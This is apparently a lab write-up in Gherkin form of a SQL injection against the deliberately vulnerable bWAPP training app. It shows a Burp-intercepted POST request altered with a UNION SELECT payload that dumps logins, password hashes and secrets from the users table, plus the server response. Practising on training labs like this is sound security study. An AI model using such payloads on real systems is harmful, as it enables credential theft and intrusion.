# language: en

Feature: SQL Injection GET/Select
  From system bWAPP
  From the A1 - Injection Category
  With Low security level

Background:
  Given I am running Debian Stretch GNU/Linux kernel 4.9.0-6-amd64
  And I am using Firefox 52.7.3 (64-bit)
  And I am running Burp Suite Community edition v1.7.30
  Given the following
  """
  URL: http://localhost/bWAPP/sqli_13.php
  Message: SQL Injection (POST/Select)
  Details:
      - Select a movie <selector> 10 items
      - Table
      - Submit button
  Objective: Perform a SQL injection through select
  """

Scenario: SQL Injection
This challenge it's quite similar to the one in sqli_2.php
Although in this case, the request is made using POST, so
I need to use Burpsuit to inject the crafted query.
  Given the selector within it's items
  """
  # sqli_13.php
  56  <p>Select a movie:
  57  <select name="movie">
  58    <option value="1">G.I. Joe: Retaliation</option>
  59    <option value="2">Iron Man</option>
  60    <option value="3">Man of Steel</option>
  61    <option value="4">Terminator Salvation</option>
  62    <option value="5">The Amazing Spider-Man</option>
  63    <option value="6">The Cabin in the Woods</option>
  64    <option value="7">The Dark Knight Rises</option>
  65    <option value="8">The Fast and the Furious</option>
  66    <option value="9">The Incredible Hulk</option>
  67    <option value="10">World War Z</option>
  68  </select>

  # There are in total 10 items to pick
  """
  When I pick one see it on Burp
  """
  # Burp Request
  POST /bWAPP/sqli_13.php HTTP/1.1
  Host: 192.168.56.101
  ...
  ...
  ...
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 17

  movie=1&action=go
  """
  And I modify the value sent on the POST request
  """
  # Burp request modified
  POST /bWAPP/sqli_13.php HTTP/1.1
  Host: 192.168.56.101
  ...
  ...
  ...
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 89

  movie=0 UNION SELECT id,login,password,email,secret,activated,admin \
  FROM users#&action=go

  # To make it work the value of the movie; -movie=0- got to be out of the
  # standard range, 1-10, can be less or equal than 0 or greater than 10.
  # This
  """
  Then on the response I got the following:
  """
  # Response
  <tr height="30">
  <td>A.I.M.</td>
  <td align="center">6885858486f31043e5839c735d99457f045affd0</td>
  <td>A.I.M. or Authentication Is Missing</td>
  <td align="center">bwapp-aim@mailinator.com</td>
  <td align="center"><a href="http://www.imdb.com/title/1" target="_blank">\
  Link</a></td>
  </tr>
  """
  And I see the injection it's successful
